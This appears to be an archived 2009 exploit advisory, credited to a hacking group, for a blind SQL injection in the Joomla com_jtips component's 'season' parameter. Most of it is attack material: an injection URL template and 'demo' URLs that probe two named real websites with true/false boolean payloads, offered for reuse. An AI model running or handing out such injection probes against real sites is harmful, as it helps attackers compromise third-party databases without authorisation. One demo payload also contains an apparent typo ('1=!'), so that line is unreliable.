Joomla Component com_jtips 1.0.x season bSQL Injection Vuln by h3m4n

VIEWS: 36 PAGES: 1

									                     Joomla Component com_jtips 1.0.x season bSQL Injection Vuln                          Page 1/1
   1   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   2   Joomla Component com_jtips (season) Blind SQL−injection Vulnerability
   3   ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   4
   5
   6   ###################################################
   7   [+] Author        : Chip D3 Bi0s
   8   [+] Group         : LatinHackteam
   9   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  10   author       :     Russell...
  11   author Email :     chipdebios[alt+64]gmail.com
  12
  13   ###################################################
  14
  15   Example:
  16   http://localhost/path/index.php?option=com_jtips&Itemid=1&task=ladder&season=2[SQL code]
  17
  18
  19   DEMO (1):
  20   http://www.brotherspjrlc.com.au/index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=1
  21   True !!!!
  22
  23   http://www.brotherspjrlc.com.au/index.php?option=com_jtips&Itemid=1&task=ladder&season=2+and+1=2
  24   False !!!
  25
  26
  27   DEMO (2):
  28   http://highfields.info/index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=1
  29   True !!!
  30
  31   http://highfields.info/index.php?option=com_jtips&Itemid=2&task=ladder&season=1+and+1=!
  32   False !!!
  33
  34
  35   etc, etc....
  36   +++++++++++++++++++++++++++++++++++++++
  37   #[!] Produced in South America
  38   +++++++++++++++++++++++++++++++++++++++
  39
  40   tested: 1.0.7 / 1.0.9
  41
  42   # milw0rm.com [2009−08−24]




Chip D3 Bi0s                                                                                              08/24/2009

								
To top